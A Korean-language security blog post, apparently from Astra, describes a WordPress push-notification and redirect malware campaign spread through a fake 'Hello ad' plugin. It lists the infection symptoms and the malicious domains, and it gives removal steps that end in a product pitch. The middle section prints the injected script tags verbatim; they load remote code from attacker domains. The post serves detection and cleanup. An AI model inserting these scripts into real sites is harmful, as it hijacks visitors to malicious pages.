최근 몇 주간 Astra의 보안 연구진은 워드프레스에서 유행하는 푸시 알림 멀웨어를 추적해 왔습니다. 이 공격 캠페인은 기존에 진행 중이던 워드프레스 사이트 리디렉션(강제 이동) 공격과 결합되어 더욱 정교해지고 있습니다.
리디렉션이 발생하는 대표적인 악성 도메인으로는 inpagepush[.]com, asoulrox[.]com, iclickcdn[.]com, justcannabis[.]online, 0.realhelpcompany[.]ga, fast.helpmart[.]ga/m[.]js?w=085 등이 확인되었습니다.
특히 이번 공격에서 해커들은 한 단계 더 나아가, 감염된 워드프레스 사이트에 'Hello ad'라는 이름의 정상 플러그인처럼 위장한 악성 플러그인을 설치했습니다. 자세한 내용은 아래에서 확인하실 수 있습니다.
관련 가이드 – 워드프레스 해킹 완벽 복구 가이드
워드프레스 푸시 알림 멀웨어의 주요 증상
- 선정적인 푸시 알림 표시: 방문자가 사이트에 접속할 때 악성 또는 선정적인 푸시 알림이 노출됩니다.

- 웹사이트 강제 리디렉션: 사이트 내 링크를 클릭하면 원래 이동해야 할 페이지가 아닌 악성 페이지로 강제 이동됩니다.

리디렉션이 발생하는 URL로는 inpagepush[.]com, asoulrox[.]com, iclickcdn[.]com 등이 있습니다. - 출처 불명의 플러그인 발견: 일부 사이트에서는 'Hello ad'라는 이름의 새로운 악성 플러그인이 워드프레스에 추가된 것이 확인되었습니다.
- 기기별로 다른 동작(모바일 전용 바이러스): 이 멀웨어는 자신을 매우 교묘하게 숨깁니다. 항상 푸시 알림을 보내거나 사용자를 리디렉션하지 않고, 기기마다 다르게 작동합니다.

예를 들어 모바일 기기에서만 푸시 알림을 표시하거나, 이전에 방문한 적이 있는 사용자가 아닌 신규 방문자에게만 리디렉션을 적용하기도 합니다.
'Hello ad' 플러그인의 의혹스러운 정체
Astra 연구진은 감염된 사이트에서 'Hello ad'라는 플러그인이 추가되어 방문자를 해커가 관리하는 웹사이트로 리디렉션하는 것을 확인했습니다.
정상적인 플러그인처럼 보이는 이 프로그램은 페이지 소스에 아래와 같은 악성 자바스크립트 코드를 삽입합니다:
<script>(function(s,u,z,p){s.src=u,s.setAttribute('data-zone',z),p.appendChild(s);})(document.createElement('script'),'https://iclickcdn.com/tag.min.js',3336627,document.body||document.documentElement)</script>
<script src="https://asoulrox.com/pfe/current/tag.min.js?z=3336643" data-cfasync="false" async></script>
<script type="text/javascript" src="//inpagepush.com/400/3336649" data-cfasync="false" async="async"></script>
이 코드는 리디렉션 공격에서 핵심적인 역할을 합니다. 다만 해커들도 계속 진화하고 있어, 캠페인이 반복될 때마다 코드를 난독화하여 탐지를 회피하려는 경향이 나타나고 있습니다.
푸시 알림 멀웨어, Hello ad 및 리디렉션 해킹 제거 방법
- 주요 감염 지점부터 점검하세요: 해커들이 악성 코드를 삽입하는 단골 위치가 있습니다. 워드프레스 복구를 시작할 때는 먼저 아래 파일들을 확인하는 것이 좋습니다.
- index.php
- wp-content/themes/{테마명}/functions.php
- wp-config.php
- 핵심 테마 파일
- .htaccess
- Hello ad 플러그인 찾아 삭제: 개발자나 본인이 과거에 설치했다고 생각되는 '정상처럼 보이는' 이 플러그인을 발견했다면 즉시 삭제하세요. 실제로는 해커가 심어놓은 것입니다 🙂
관련 가이드 – 워드프레스 멀웨어 제거 - 리디렉션 제거: 워드프레스 리디렉션 공격은 이미 수개월째 지속되고 있습니다. 악성 리디렉션 해킹을 해결하려면 데이터베이스 테이블, 핵심 테마 파일, 경우에 따라서는 서버 설정 파일까지 꼼꼼히 살펴야 하며, 출처를 알 수 없는 URL에서 로딩되는 스크립트나 리소스를 찾아 제거해야 합니다.
리디렉션 멀웨어가 매우 만연해 있기 때문에, 저희는 이를 해결하는 상세한 단계별 영상 가이드도 제작했습니다. 해커들이 보안 업체의 레이더에 걸리지 않으려고 수단을 끊임없이 바꾸지만, 근본적인 해결 원칙은 동일합니다.
해커들은 세상에 알려지지 않은 취약점을 악용하고 여러 익스플로잇을 조합하여 공격 방식을 끊임없이 진화시킵니다. 해킹을 제거하는 것도 중요하지만, 재감염을 막는 더 근본적인 해결책이 필요합니다. 그런 부분에서 Astra의 보안 솔루션이 큰 도움이 될 수 있습니다 🙂